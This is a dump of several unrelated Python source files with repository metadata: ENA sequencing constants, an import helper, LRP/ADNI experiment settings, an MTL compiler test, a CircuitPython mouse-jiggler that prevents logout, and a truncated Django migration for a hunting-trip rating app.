49c7ae5b76fbf1b02e8d130eadfb4143e44dcc80 | 8,141 | py | Python | cubi_tk/ena_constants.py | eudesbarbosa/cubi-tk | 80c3ef9387f2399f796b2cc445b99781d541f222 | ["MIT"] | 3 | 2020-09-23T13:06:41.000Z | 2022-01-14T10:14:20.000Z | cubi_tk/ena_constants.py | eudesbarbosa/cubi-tk | 80c3ef9387f2399f796b2cc445b99781d541f222 | ["MIT"] | 65 | 2020-09-23T13:22:41.000Z | 2022-03-17T11:02:42.000Z | cubi_tk/ena_constants.py | eudesbarbosa/cubi-tk | 80c3ef9387f2399f796b2cc445b99781d541f222 | ["MIT"] | 4 | 2020-09-25T11:28:45.000Z | 2021-11-01T12:00:13.000Z |
"""Values for controlled vocabularies from ENA.
Taken from
- https://ena-docs.readthedocs.io/en/latest/submit/reads/webin-cli.html
"""
# Constants for platform definitions.
LS454 = "LS454"
ILLUMINA = "ILLUMINA"
PACBIO_SMRT = "PACBIO_SMRT"
IONTORRENT = "ION_TORRENT"
CAPILLARY = "CAPILLARY"
ONT = "OXFORD_NANOPORE"
BGISEQ = "BGISEQ"
DNBSEQ = "DNBSEQ"
#: Allowed platforms in ENA.
PLATFORMS = (LS454, ILLUMINA, PACBIO_SMRT, IONTORRENT, CAPILLARY, ONT, BGISEQ, DNBSEQ)
# Constants for platforms.
LS454_454GS = "454 GS"
LS454_454GS_240 = "454 GS 20"
LS454_454GS_FLX = "454 GS FLX"
LS454_454GS_FLX_PLUS = "454 GS FLX+"
LS454_454GS_FLX_TITANIUM = "454 GS FLX Titanium"
LS454_454GS_JUNIOR = "454 GS Junior"
ILLUMINA_HISEQX_FIVE = "HiSeq X Five"
ILLUMINA_HISEQX_TEN = "HiSeq X Ten"
ILLUMINA_GA = "Illumina Genome Analyzer"
ILLUMINA_GA2 = "Illumina Genome Analyzer II"
ILLUMINA_GA2x = "Illumina Genome Analyzer IIx"
ILLUMINA_HISCANQ = "Illumina HiScanSQ"
ILLUMINA_HISEQ_1000 = "Illumina HiSeq 1000"
ILLUMINA_HISEQ_1500 = "Illumina HiSeq 1500"
ILLUMINA_HISEQ_2000 = "Illumina HiSeq 2000"
ILLUMINA_HISEQ_2500 = "Illumina HiSeq 2500"
ILLUMINA_HISEQ_3000 = "Illumina HiSeq 3000"
ILLUMINA_HISEQ_4000 = "Illumina HiSeq 4000"
ILLUMINA_ISEQ_100 = "Illumina iSeq 100"
ILLUMINA_MISEQ = "Illumina MiSeq"
ILLUMINA_MINISEQ = "Illumina MiniSeq"
ILLUMINA_NOVASEQ_6000 = "Illumina NovaSeq 6000"
ILLUMINA_NETSEQ_500 = "NextSeq 500"
ILLUMINA_NETSEQ_550 = "NextSeq 550"
PACBIO_RS = "PacBio RS"
PACBIO_RS2 = "PacBio RS II"
PACBIO_SEQEL = "Sequel"
IONTORRENT_PGM = "Ion Torrent PGM"
IONTORRENT_PROTON = "Ion Torrent Proton"
IONTORRENT_S5 = "Ion Torrent S5"
IONTORRENT_S5XL = "Ion Torrent S5 XL"
ABI_AB3730XL = "AB 3730xL Genetic Analyzer"
ABI_AB3730 = "AB 3730 Genetic Analyzer"
ABI_AB3500XL = "AB 3500xL Genetic Analyzer"
ABI_AB3500 = "AB 3500 Genetic Analyzer"
ABI_AB3130XL = "AB 3130xL Genetic Analyzer"
ABI_AB3130 = "AB 3130 Genetic Analyzer"
ABI_AB310 = "AB 310 Genetic Analyzer"
ONT_MINION = "MinION"
ONT_GRIDION = "GridION"
ONT_PROMETHION = "PromethION"
BGI_BGISEQ500 = "BGISEQ-500"
DNB_T7 = "DNBSEQ-T7"
DNB_G400 = "DNBSEQ-G400"
DNB_G50 = "DNBSEQ-G50"
DNB_G400_FAST = "DNBSEQ-G400 FAST"
UNSPECIFIED = "unspecified"
#: Allowed values for instruments in ENA records.
INSTRUMENTS = (
LS454_454GS,
LS454_454GS_240,
LS454_454GS_FLX,
LS454_454GS_FLX_PLUS,
LS454_454GS_FLX_TITANIUM,
LS454_454GS_JUNIOR,
ILLUMINA_HISEQX_FIVE,
ILLUMINA_HISEQX_TEN,
ILLUMINA_GA,
ILLUMINA_GA2,
ILLUMINA_GA2x,
ILLUMINA_HISCANQ,
ILLUMINA_HISEQ_1000,
ILLUMINA_HISEQ_1500,
ILLUMINA_HISEQ_2000,
ILLUMINA_HISEQ_2500,
ILLUMINA_HISEQ_3000,
ILLUMINA_HISEQ_4000,
ILLUMINA_ISEQ_100,
ILLUMINA_MISEQ,
ILLUMINA_MINISEQ,
ILLUMINA_NOVASEQ_6000,
ILLUMINA_NETSEQ_500,
ILLUMINA_NETSEQ_550,
PACBIO_RS,
PACBIO_RS2,
PACBIO_SEQEL,
IONTORRENT_PGM,
IONTORRENT_PROTON,
IONTORRENT_S5,
IONTORRENT_S5XL,
ABI_AB3730XL,
ABI_AB3730,
ABI_AB3500XL,
ABI_AB3500,
ABI_AB3130XL,
ABI_AB3130,
ABI_AB310,
ONT_MINION,
ONT_GRIDION,
ONT_PROMETHION,
BGI_BGISEQ500,
DNB_T7,
DNB_G400,
DNB_G50,
DNB_G400_FAST,
UNSPECIFIED,
)
# Constants for library selection.
LIBSEL_RANDOM = "RANDOM"
LIBSEL_PCR = "PCR"
LIBSEL_RANDOM_PCR = "RANDOM PCR"
LIBSEL_RT_PCR = "RT-PCR"
LIBSEL_HMPR = "HMPR"
LIBSEL_MF = "MF"
LIBSEL_REPEAT_FRACTIONATION = "repeat fractionation"
LIBSEL_SIZE_FRACTIONATION = "size fractionation"
LIBSEL_MSLL = "MSLL"
LIBSEL_CDNA = "cDNA"
LIBSEL_CDNA_RANDOM_PRIMING = "cDNA_randomPriming"
LIBSEL_CDNA_OLIGO_DT = "cDNA_oligo_dT"
LIBSEL_POLYA = "PolyA"
LIBSEL_OLIGO_DT = "Oligo-dT"
LIBSEL_INVERSE_RNA = "Inverse rRNA"
LIBSEL_INVERSE_RNA_SELECTION = "Inverse rRNA selection"
LIBSEL_CHIP = "ChIP"
LIBSEL_CHIP_SEQ = "ChIP-Seq"
LIBSEL_MNASE = "MNase"
LIBSEL_DNASE = "DNase"
LIBSEL_HYBRID_SELECTION = "Hybrid Selection"
LIBSEL_REDUCED_REPRESENTATION = "Reduced Representation"
LIBSEL_RESTRICTION_DIGEST = "Restriction Digest"
LIBSEL_5HETYHLCYTITINE_ANTIBODY = "5-methylcytidine antibody"
LIBSEL_MBD2_PROTEIN_METHYL_CPG_BINDING_DOMAIN = "MBD2 protein methyl-CpG binding domain"
LIBSEL_CAGE = "CAGE"
LIBSEL_RACE = "RACE"
LIBSEL_MDA = "MDA"
LIBSEL_PADLOCK_PROBES_CPATURE_METHOD = "padlock probes capture method"
LIBSEL_OTHER = "other"
LIBSEL_UNSPECIFIED = "unspecified"
#: Allowed library selection strategies for ENA records.
LIBRARY_SELECTIONS = (
LIBSEL_RANDOM,
LIBSEL_PCR,
LIBSEL_RANDOM_PCR,
LIBSEL_RT_PCR,
LIBSEL_HMPR,
LIBSEL_MF,
LIBSEL_REPEAT_FRACTIONATION,
LIBSEL_SIZE_FRACTIONATION,
LIBSEL_MSLL,
LIBSEL_CDNA,
LIBSEL_CDNA_RANDOM_PRIMING,
LIBSEL_CDNA_OLIGO_DT,
LIBSEL_POLYA,
LIBSEL_OLIGO_DT,
LIBSEL_INVERSE_RNA,
LIBSEL_INVERSE_RNA_SELECTION,
LIBSEL_CHIP,
LIBSEL_CHIP_SEQ,
LIBSEL_MNASE,
LIBSEL_DNASE,
LIBSEL_HYBRID_SELECTION,
LIBSEL_REDUCED_REPRESENTATION,
LIBSEL_RESTRICTION_DIGEST,
LIBSEL_5HETYHLCYTITINE_ANTIBODY,
LIBSEL_MBD2_PROTEIN_METHYL_CPG_BINDING_DOMAIN,
LIBSEL_CAGE,
LIBSEL_RACE,
LIBSEL_MDA,
LIBSEL_PADLOCK_PROBES_CPATURE_METHOD,
LIBSEL_OTHER,
LIBSEL_UNSPECIFIED,
)
# Constants for library sources.
LIBSRC_GENOMIC = "GENOMIC"
LIBSRC_GENOMIC_SC = "GENOMIC SINGLE CELL"
LIBSRC_TRANSCRIPTOMIC = "TRANSCRIPTOMIC"
LIBSRC_TRANSCRIPTOMIC_SC = "TRANSCRIPTOMIC SINGLE CELL"
LIBSRC_METAGENOMIC = "METAGENOMIC"
LIBSRC_METATRANSCRIPTOMIC = "METATRANSCRIPTOMIC"
LIBSRC_SYNTHETIC = "SYNTHETIC"
LIBSRC_VIRAL_RNA = "VIRAL RNA"
LIBSRC_OTHER = "OTHER"
#: Allowed library sources for ENA records.
LIBRARY_SOURCES = (
LIBSRC_GENOMIC,
LIBSRC_GENOMIC_SC,
LIBSRC_TRANSCRIPTOMIC,
LIBSRC_TRANSCRIPTOMIC_SC,
LIBSRC_METAGENOMIC,
LIBSRC_METATRANSCRIPTOMIC,
LIBSRC_SYNTHETIC,
LIBSRC_VIRAL_RNA,
LIBSRC_OTHER,
)
# Constants for library strategies.
LIBSTR_WGS = "WGS"
LIBSTR_WGA = "WGA"
LIBSTR_WXS = "WXS"
LIBSTR_RNA_SEQ = "RNA-Seq"
LIBSTR_SSRNA_SEQ = "ssRNA-seq"
LIBSTR_MIRNA_SEQ = "miRNA-Seq"
LIBSTR_NCRNA_SEQ = "ncRNA-Seq"
LIBSTR_FL_CDNA = "FL-cDNA"
LIBSTR_EST = "EST"
LIBSTR_HIC = "Hi-C"
LIBSTR_ATAC_SEQ = "ATAC-seq"
LIBSTR_WCS = "WCS"
LIBSTR_RAD_SEQ = "RAD-Seq"
LIBSTR_CLONE = "CLONE"
LIBSTR_POOLCLONE = "POOLCLONE"
LIBSTR_AMPLICON = "AMPLICON"
LIBSTR_CLONEEND = "CLONEEND"
LIBSTR_FINISHING = "FINISHING"
LIBSTR_CHIP_SEQ = "ChIP-Seq"
LIBSTR_MNASE_EQ = "MNase-Seq"
LIBSTR_DNASE_HYPERSENSITIVITY = "DNase-Hypersensitivity"
LIBSTR_BISULFITE_SEQ = "Bisulfite-Seq"
LIBSTR_CTS = "CTS"
LIBSTR_MRE_SEQ = "MRE-Seq"
LIBSTR_MEDIP_SEQ = "MeDIP-Seq"
LIBSTR_MBD_SEQ = "MBD-Seq"
LIBSTR_TN_SEQ = "Tn-Seq"
LIBSTR_VALIDATION = "VALIDATION"
LIBSTR_FAIRE_SEQ = "FAIRE-seq"
LIBSTR_SELEX = "SELEX"
LIBSTR_RIP_SEQ = "RIP-Seq"
LIBSTR_CHIA_PET = "ChIA-PET"
LIBSTR_SYNTHEETIC_LONG_READ = "Synthetic-Long-Read"
LIBSTR_TARGETED_CAPTURE = "Targeted-Capture"
LIBSTR_TETHERED_CHROMATIN_CONFORMATION_CAPTURE = "Tethered Chromatin Conformation Capture"
LIBSTR_OTHER = "OTHER"
#: Allowed library strategies for ENA records.
LIBRARY_STRATEGIES = (
LIBSTR_WGS,
LIBSTR_WGA,
LIBSTR_WXS,
LIBSTR_RNA_SEQ,
LIBSTR_SSRNA_SEQ,
LIBSTR_MIRNA_SEQ,
LIBSTR_NCRNA_SEQ,
LIBSTR_FL_CDNA,
LIBSTR_EST,
LIBSTR_HIC,
LIBSTR_ATAC_SEQ,
LIBSTR_WCS,
LIBSTR_RAD_SEQ,
LIBSTR_CLONE,
LIBSTR_POOLCLONE,
LIBSTR_AMPLICON,
LIBSTR_CLONEEND,
LIBSTR_FINISHING,
LIBSTR_CHIP_SEQ,
LIBSTR_MNASE_EQ,
LIBSTR_DNASE_HYPERSENSITIVITY,
LIBSTR_BISULFITE_SEQ,
LIBSTR_CTS,
LIBSTR_MRE_SEQ,
LIBSTR_MEDIP_SEQ,
LIBSTR_MBD_SEQ,
LIBSTR_TN_SEQ,
LIBSTR_VALIDATION,
LIBSTR_FAIRE_SEQ,
LIBSTR_SELEX,
LIBSTR_RIP_SEQ,
LIBSTR_CHIA_PET,
LIBSTR_SYNTHEETIC_LONG_READ,
LIBSTR_TARGETED_CAPTURE,
LIBSTR_TETHERED_CHROMATIN_CONFORMATION_CAPTURE,
LIBSTR_OTHER,
)
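# Small validation sketch (not part of the original module): the tuples above
# act as controlled vocabularies, so membership checks are the typical use.
def _is_valid_instrument(platform, instrument):
    # True when both the platform and the instrument are ENA-recognised values.
    return platform in PLATFORMS and instrument in INSTRUMENTS

# _is_valid_instrument(ILLUMINA, ILLUMINA_MISEQ)  -> True
# _is_valid_instrument("NANOPORE", "MinION 2")    -> False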
| 27.59661 | 91 | 0.737624 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,401 | 0.294927 |
49c885495b8b9d85f2a2df00b05e024d355e6e0a | 1,463 | py | Python | analytics/utils.py | educreations/py-analytics | abbc814925c6cc200b3329c7de9f1868e1cb8c01 | ["Apache-2.0"] | 10 | 2015-01-25T20:29:55.000Z | 2020-12-08T21:35:09.000Z | analytics/utils.py | educreations/py-analytics | abbc814925c6cc200b3329c7de9f1868e1cb8c01 | ["Apache-2.0"] | 3 | 2018-05-15T06:28:20.000Z | 2021-03-30T17:47:45.000Z | analytics/utils.py | educreations/py-analytics | abbc814925c6cc200b3329c7de9f1868e1cb8c01 | ["Apache-2.0"] | 6 | 2017-07-03T16:28:29.000Z | 2020-06-15T19:10:45.000Z |
"""
Copyright 2012 Numan Sachwani <numan@7Geese.com>
This file is provided to you under the Apache License,
Version 2.0 (the "License"); you may not use this file
except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
# import_string comes form Werkzeug
# http://werkzeug.pocoo.org
def import_string(import_name, silent=False):
"""Imports an object based on a string. If *silent* is True the return
value will be None if the import fails.
Simplified version of the function with same name from `Werkzeug`_.
:param import_name:
The dotted name for the object to import.
:param silent:
If True, import errors are ignored and None is returned instead.
:returns:
The imported object.
"""
import_name = str(import_name)
try:
if '.' in import_name:
module, obj = import_name.rsplit('.', 1)
return getattr(__import__(module, None, None, [obj]), obj)
else:
return __import__(import_name)
except (ImportError, AttributeError):
if not silent:
raise
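# Usage sketch (not part of the original file): resolve objects from dotted paths.
#
# json_dumps = import_string('json.dumps')                     # the json.dumps function
# missing = import_string('json.does_not_exist', silent=True)  # None, the import error is swallowed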
| 32.511111 | 74 | 0.699932 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,074 | 0.734108 |
49c8b96abc3f198aa66587406ab8b7e9c78fd259 | 31 | py | Python | lemkelcp/__init__.py | pritam-dey3/lemkelcp | 4d963a6d0e6ba531496f5b0e99a52c0d288e4a6e | ["MIT"] | 10 | 2019-03-17T19:37:25.000Z | 2022-01-02T04:29:05.000Z | lemkelcp/__init__.py | pritam-dey3/lemkelcp | 4d963a6d0e6ba531496f5b0e99a52c0d288e4a6e | ["MIT"] | 1 | 2019-09-25T09:32:49.000Z | 2021-12-28T05:05:55.000Z | lemkelcp/__init__.py | pritam-dey3/lemkelcp | 4d963a6d0e6ba531496f5b0e99a52c0d288e4a6e | ["MIT"] | 4 | 2019-02-24T11:49:10.000Z | 2020-06-06T14:07:11.000Z |
from .lemkelcp import lemkelcp
| 15.5 | 30 | 0.83871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
49c93ee339debd703889e1a8187ecdfd356689ca | 1,999 | py | Python | settings.py | ArneBinder/Pytorch-LRP | c17902138f1d560f1f5d38f401ac856e071a5800 | ["BSD-3-Clause"] | 117 | 2019-03-19T08:47:03.000Z | 2022-03-31T04:14:51.000Z | settings.py | ArneBinder/Pytorch-LRP | c17902138f1d560f1f5d38f401ac856e071a5800 | ["BSD-3-Clause"] | 10 | 2019-09-15T14:59:43.000Z | 2022-03-15T14:18:02.000Z | settings.py | ArneBinder/Pytorch-LRP | c17902138f1d560f1f5d38f401ac856e071a5800 | ["BSD-3-Clause"] | 49 | 2019-03-19T08:47:03.000Z | 2021-11-30T01:02:04.000Z |
"""
Settings for re-running the experiments from the paper "Layer-wise
relevance propagation for explaining deep neural network decisions
in MRI-based Alzheimer’s disease classification".
Please note that you need to download the ADNI data from
http://adni.loni.usc.edu/ and preprocess it using
https://github.com/ANTsX/ANTs/blob/master/Scripts/antsRegistrationSyNQuick.sh
Please prepare the data, such that you will get three HDF5 files,
consisting of a training, a validation and a holdout (test) set.
Each HDF5 file is required to have 2 datasets, namely X and y,
containing the data matrix and label vector accordingly. We have
included the "Data Split ADNI.ipynb" file as a guideline for data splitting.
Please note that it is highly dependent on the format of your data storage
and needs to be individualized as such.
Furthermore you will need SPM12 https://www.fil.ion.ucl.ac.uk/spm/software/spm12/
in order to access the Neuromorphometrics atlas.
Arguments:
model_path: Path to the trained pytorch model parameters
data_path: Path where the outputs will be stored and retrieved
ADNI_DIR: Path to the root of your downloaded ADNI data
train_h5: Path to the training set HDF5 file
val_h5: Path to the validation set HDF5 file
holdout_h5: Path to the holdout set HDF5 file
binary_brain_mask: Path to the mask used for masking the images,
included in the repository.
nmm_mask_path: Path to the Neuromorphometrics mask. Needs to be
acquired from SPM12. Typically located under
~/spm12/tpm/labels_Neuromorphometrics.nii
nmm_mask_path_scaled: Path to the rescaled Neuromorphometrics mask.
"""
settings = {
"model_path": INSERT,
"data_path": INSERT,
"ADNI_DIR": INSERT,
"train_h5": INSERT,
"val_h5": INSERT,
"holdout_h5": INSERT,
"binary_brain_mask": "binary_brain_mask.nii.gz",
"nmm_mask_path": "~/spm12/tpm/labels_Neuromorphometrics.nii",
"nmm_mask_path_scaled": "nmm_mask_rescaled.nii"
}
| 40.795918 | 81 | 0.758379 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,876 | 0.937531 |
49ca8eabe12b4dbe3823135f9cccd4003e5ec8f9 | 274 | py | Python | compiler_test.py | zpcore/ACOW | 9d9186eb28af3e5e1242621457f36d5a7910366a | ["MIT"] | null | null | null | compiler_test.py | zpcore/ACOW | 9d9186eb28af3e5e1242621457f36d5a7910366a | ["MIT"] | null | null | null | compiler_test.py | zpcore/ACOW | 9d9186eb28af3e5e1242621457f36d5a7910366a | ["MIT"] | null | null | null |
'''
# Test the compiler
'''
from ACOW import *
data = '''
a1 U[1,2] !a0&G[1,3]a3
'''
print('MTL Formula:',data)
# Test lex
print('\nLex Test:')
lexer.input(data)
for tok in lexer:
print(tok)
# Test parser
print('\nParser Test:')
result = parser.parse(data)
print(result)
| 13.7 | 27 | 0.645985 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 123 | 0.448905 |
49caba94d9ddd16a821b2ba8d9ea2e815b9e25e0 | 1,292 | py | Python | code.py | RanaTe/AntiLogOut | 0d970f6202fb16be469de6a98c45c0cfb4b910f0 | ["OML"] | null | null | null | code.py | RanaTe/AntiLogOut | 0d970f6202fb16be469de6a98c45c0cfb4b910f0 | ["OML"] | null | null | null | code.py | RanaTe/AntiLogOut | 0d970f6202fb16be469de6a98c45c0cfb4b910f0 | ["OML"] | null | null | null |
import board
import time
import random
import usb_hid
from adafruit_hid.mouse import Mouse
from adafruit_hid.keyboard import Keyboard
mouse = Mouse(usb_hid.devices)
goright=True
while True:
#2 parts to sequence, move mostly right, then mostly left
# set up for big move
#longwait=random.randint(250,350)
longwait=random.randint(2,3)
bigoffsetx=random.randint(-10,10)
bigoffsety=random.randint(-7,7)
# do 1st big move
if goright:
# do a right move
print("moving right")
mouse.move(100+bigoffsetx,bigoffsety)
goright=False
else:
# do a left move
print("moving left")
mouse.move(-100+bigoffsetx,bigoffsety)
goright=True
# do some quick clicks and moves
numberofclicks=random.randint(3,6)
print("doing some clicks")
for ismall in range(1,numberofclicks):
#shortwait in ms (double click is usually less than 500ms)
shortwait=0.001*random.randint(250,600)
#print(shortwait)
shortmovex=random.randint(-9,9)
shortmovey=random.randint(-7,7)
#move, wait, click
mouse.move(shortmovex,shortmovey)
time.sleep(shortwait)
mouse.click(Mouse.LEFT_BUTTON)
time.sleep(longwait)
print("waiting for next move")
| 25.84 | 66 | 0.666409 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 361 | 0.279412 |
49cc558662f5dd7e7fb056fd6f79d57effb78d66 | 315 | py | Python | insta/admin.py | Stephenremmi/insta-clone | 88af361dca160f7840842ebebc306a02f97920ca | ["MIT"] | null | null | null | insta/admin.py | Stephenremmi/insta-clone | 88af361dca160f7840842ebebc306a02f97920ca | ["MIT"] | 3 | 2021-03-30T13:54:34.000Z | 2021-09-08T02:17:46.000Z | insta/admin.py | Stephenremmi/insta-clone | 88af361dca160f7840842ebebc306a02f97920ca | ["MIT"] | null | null | null |
from django.contrib import admin
from .models import Post, Comment, UserProfile
class ProfileAdmin(admin.ModelAdmin):
filter_horizontal =("followers", "following",)
# Register your models here.
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(UserProfile, admin_class=ProfileAdmin)
| 26.25 | 58 | 0.796825 | 88 | 0.279365 | 0 | 0 | 0 | 0 | 0 | 0 | 50 | 0.15873 |
49cd3c2fd0bbd8a92289c21bd54ca7e440919719 | 25,042 | py | Python | travelling/migrations/0001_initial.py | HerbyDE/jagdreisencheck-webapp | 9af5deda2423b787da88a0c893f3c474d8e4f73f | ["BSD-3-Clause"] | null | null | null | travelling/migrations/0001_initial.py | HerbyDE/jagdreisencheck-webapp | 9af5deda2423b787da88a0c893f3c474d8e4f73f | ["BSD-3-Clause"] | null | null | null | travelling/migrations/0001_initial.py | HerbyDE/jagdreisencheck-webapp | 9af5deda2423b787da88a0c893f3c474d8e4f73f | ["BSD-3-Clause"] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-11-27 14:43
from __future__ import unicode_literals
import ckeditor.fields
from django.conf import settings
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import django_countries.fields
import jagdreisencheck.custom_fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0006_auto_20181121_2205'),
('cms', '0020_old_tree_cleanup'),
]
operations = [
migrations.CreateModel(
name='AccommodationPrice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('acc_type', models.CharField(choices=[('S', 'Self Organized'), ('C', 'Camping Sight'), ('B', 'Bungalow/Simple Accomodation'), ('BB', 'Bed & Breakfast'), ('H', 'Hotel')], max_length=2, null=True, verbose_name='Accommodation')),
('price_hunter', models.FloatField(null=True, verbose_name='Price per hunter')),
('price_non_hunter', models.FloatField(null=True, verbose_name='Price per accompanying person')),
('calc_base', models.CharField(choices=[('DAY', 'Per day')], max_length=3, null=True, verbose_name='Calculation base')),
],
),
migrations.CreateModel(
name='Game',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=150, unique=True, verbose_name='Name')),
('pub_date', models.DateTimeField(auto_now_add=True, verbose_name='Date of Creation')),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Creator')),
],
options={
'verbose_name': 'Game',
'verbose_name_plural': 'Games',
},
),
migrations.CreateModel(
name='GamePrice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(blank=True, max_length=75, null=True, verbose_name='Gender/Type')),
('calc_base', models.CharField(choices=[('CIC', 'CIC points'), ('PCS', 'Pieces'), ('KGS', 'Per kg'), ('AGE', 'Age class')], max_length=3, null=True, verbose_name='Calculation base')),
('base_range', models.CharField(max_length=20, null=True, verbose_name='Range')),
('trophy_costs', models.FloatField(null=True, verbose_name='Trophy costs')),
('wounded_costs', models.FloatField(null=True, verbose_name='Wounded but not found - costs')),
('private_notes', models.TextField(blank=True, null=True, verbose_name='Private notes')),
('public_notes', models.TextField(blank=True, null=True, verbose_name='Public notes')),
('game', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='travelling.Game', verbose_name='Game')),
],
),
migrations.CreateModel(
name='PriceList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('last_modified', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Last modified')),
],
),
migrations.CreateModel(
name='Rating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language', models.CharField(max_length=6, null=True, verbose_name='Language')),
('date_created', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Creation Date')),
('last_modified', models.DateTimeField(blank=True, null=True, verbose_name='Last Modified')),
('agree_to_rules_of_contribution', models.BooleanField(default=False, verbose_name='Agree to Rules of Contribution')),
('name', models.CharField(max_length=90, null=True, verbose_name='Title')),
('description', models.TextField(blank=True, max_length=3000, null=True, verbose_name='Detailed Trip Description')),
('nps_indication', models.PositiveIntegerField(choices=[(1, 'No recommendation'), (2, 'Rather no recommendation'), (3, 'Indifferent'), (4, 'Recommendation'), (5, 'Definite recommendation')], default=3, null=True, verbose_name='Would you recommend the trip?')),
('trophies', django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True, verbose_name='Trophies')),
('meal_option', models.CharField(choices=[('N', 'No Meals Included'), ('B', 'Breakfast Included'), ('H', 'Breakfast & Dinner Included'), ('A', 'All Inclusive')], max_length=2, null=True, verbose_name='Catering Option')),
('meal_quality', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Catering Quality')),
('accommodation_type', models.CharField(choices=[('S', 'Self Organized'), ('C', 'Camping Sight'), ('B', 'Bungalow/Simple Accomodation'), ('BB', 'Bed & Breakfast'), ('H', 'Hotel')], default='S', max_length=2, null=True, verbose_name='Accommodation Type')),
('accommodation_rating', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Accommodation Rating')),
('support_with_issues', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Operator Support with Issues')),
('price_utility', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Price/Utility')),
('use_of_dogs', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Did you make use of dogs?')),
('dog_purpose', models.CharField(blank=True, choices=[('NO', 'No Dogs were needed'), ('NH', 'Chasing Dogs'), ('DR', 'Joint Hunt'), ('PI', 'Deerstalking Support')], max_length=3, null=True, verbose_name='What did you use the dogs for?')),
('dog_quality', models.IntegerField(blank=True, choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Quality of dogs')),
('game_density', models.IntegerField(choices=[(1, 'Too sparse'), (3, 'Rather too sparse'), (5, 'Optimal density'), (3, 'Rather too dense'), (1, 'Too dense')], null=True, verbose_name='How dense was the wildlife?')),
('game_age_dist', models.IntegerField(choices=[(1, 'Too young'), (3, 'Rather too young'), (5, 'Optimal'), (3, 'Rather too old'), (1, 'Too old'), (0, 'Unknown')], null=True, verbose_name="How was the wildlife's age distributed?")),
('game_gender_dist', models.IntegerField(choices=[(1, 'Predominantly female game'), (3, 'Slight overweight of female game'), (5, 'Good gender distribution'), (3, 'Slight overweight of male game'), (1, 'Predominantly male game'), (0, 'Unknown')], null=True, verbose_name="How did you experience the wildlife's gender distribution?")),
('hunt_in_wilderness', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Did you hunt in the wilderness?')),
('check_strike_pos', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Was the strike position of your rifle checked?')),
('check_hunt_license', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Was your hunting license validated?')),
('professional_hunter_quality', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Quality of the professional hunter')),
('customer_support', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Customer Support')),
('hunting_introduction', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Introduction to local hunting conditions')),
('staff_languages', jagdreisencheck.custom_fields.ListField(null=True, verbose_name='Languages spoken at the hunting site')),
('communication_quality', models.IntegerField(choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Communication between staff and yourself')),
('alternative_program', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Did you make use of alternative program')),
('quality_alternative_program', models.IntegerField(blank=True, choices=[(1, 'Bad'), (2, 'Rather Bad'), (3, 'Neutral'), (4, 'Rather Good'), (5, 'Good')], null=True, verbose_name='Quality of the alternative program')),
('economic_rating', models.DecimalField(decimal_places=4, max_digits=5, null=True, verbose_name='Economic Rating')),
('ecologic_rating', models.DecimalField(decimal_places=4, max_digits=5, null=True, verbose_name='Ecologic Rating')),
('social_rating', models.DecimalField(decimal_places=4, max_digits=5, null=True, verbose_name='Socio-Cultural Rating')),
('overall_rating', models.DecimalField(decimal_places=4, max_digits=5, null=True, verbose_name='Total Rating')),
],
),
migrations.CreateModel(
name='TravelInquiry',
fields=[
